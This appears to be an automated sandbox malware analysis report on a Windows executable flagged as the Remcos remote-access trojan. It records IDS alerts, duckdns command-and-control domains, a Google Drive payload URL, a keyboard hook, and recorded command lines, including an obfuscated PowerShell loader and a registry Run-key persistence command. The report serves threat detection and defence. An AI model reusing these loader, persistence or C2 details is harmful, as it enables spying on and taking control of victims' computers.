Windows Analysis Report
x295IO8kqM.exe

Suricata IDS alerts for network traffic

Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\aksloest.dat, type: DROPPED

Source: x295IO8kqM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.11.20:49715 version: TLS 1.2

Source: x295IO8kqM.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_0040635D FindFirstFileW,FindClose,	0_2_0040635D
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_0040580B GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_0040580B
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB

Networking

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49716 -> 192.169.69.26:2879
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49718 -> 172.111.244.113:2879
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 172.111.244.113:2879 -> 192.168.11.20:49718
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.11.20:49717 -> 192.169.69.26:2889

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: eweo9264gtuiort.duckdns.org
Source: Malware configuration extractor	URLs: eweo9264gtuiort.duckdns.org
Source: Malware configuration extractor	URLs: eweo9264gtuiorta1.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: eweo9264gtuiorta1.duckdns.org
Source: unknown	DNS query: name: eweo9264gtuiort.duckdns.org

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26

Source: Joe Sandbox View	ASN Name: M247GB M247GB
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49719 -> 178.237.33.50:80
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49714 -> 172.217.215.102:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: eweo9264gtuiort.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: eweo9264gtuiorta1.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5270270708.0000000024AA6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145548154.0000000024AA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gplBs
Source: msiexec.exe, 00000003.00000003.3201211577.0000000024AA5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3201184446.0000000024AA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpoAJ
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpqs
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpxeFp
Source: x295IO8kqM.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000003.00000003.4145873580.0000000000828000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/-449a-bb32-9d4a700c395b
Source: msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?
Source: msiexec.exe, 00000003.00000003.4145873580.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000836000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000836000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/g
Source: msiexec.exe, 00000003.00000002.5248319710.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5270075772.00000000247D0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248319710.00000000007CA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf
Source: msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000003.00000002.5248447149.000000000080D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.000000000080B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/(R
Source: msiexec.exe, 00000003.00000003.4145873580.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Hx
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.5248496785.0000000000851000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download
Source: msiexec.exe, 00000003.00000003.4145873580.0000000000851000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1VBp5hwEc0K5hVzP7EBqqCDh7LB2QQNMf&export=download&
Source: msiexec.exe, 00000003.00000002.5248496785.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3051859071.000000000087D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145873580.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4145600185.0000000000878000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.3091077063.0000000000878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000003.00000003.3052108613.00000000008AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

Source: unknown	HTTPS traffic detected: 172.217.215.102:443 -> 192.168.11.20:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 108.177.122.132:443 -> 192.168.11.20:49715 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\msiexec.exe

Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Code function: 0_2_004052B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004052B8

E-Banking Fraud

Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 5324, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\aksloest.dat, type: DROPPED

Source: C:\Windows\SysWOW64\msiexec.exe

Process Stats: CPU usage > 6%

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Code function: 0_2_0040326A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,CoUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040326A

Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_004066E2		0_2_004066E2
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Code function: 0_2_00404AF5		0_2_00404AF5

Source: x295IO8kqM.exe

Static PE information: invalid certificate

Source: x295IO8kqM.exe, 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamechartrooms fremtoningsprg.exen' vs x295IO8kqM.exe
Source: x295IO8kqM.exe	Binary or memory string: OriginalFilenamechartrooms fremtoningsprg.exen' vs x295IO8kqM.exe

Source: x295IO8kqM.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@11/17@5/5

Source: C:\Users\user\Desktop\x295IO8kqM.exe

0_2_0040326A

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Code function: 0_2_00404579 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404579

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Code function: 0_2_00402095 CoCreateInstance,

0_2_00402095

Source: C:\Users\user\Desktop\x295IO8kqM.exe

File created: C:\Program Files (x86)\Common Files\Nonskeletally

Source: C:\Users\user\Desktop\x295IO8kqM.exe

File created: C:\Users\user\AppData\Roaming\woady

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1000:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\alsmdjtru-Z27L4O
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03

Source: C:\Users\user\Desktop\x295IO8kqM.exe

File created: C:\Users\user\AppData\Local\Temp\nsh35B9.tmp

Source: x295IO8kqM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\x295IO8kqM.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\x295IO8kqM.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: x295IO8kqM.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\x295IO8kqM.exe

File read: C:\Users\user\Desktop\x295IO8kqM.exe

Source: unknown	Process created: C:\Users\user\Desktop\x295IO8kqM.exe "C:\Users\user\Desktop\x295IO8kqM.exe"
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin)	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"	Jump to behavior

Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\x295IO8kqM.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
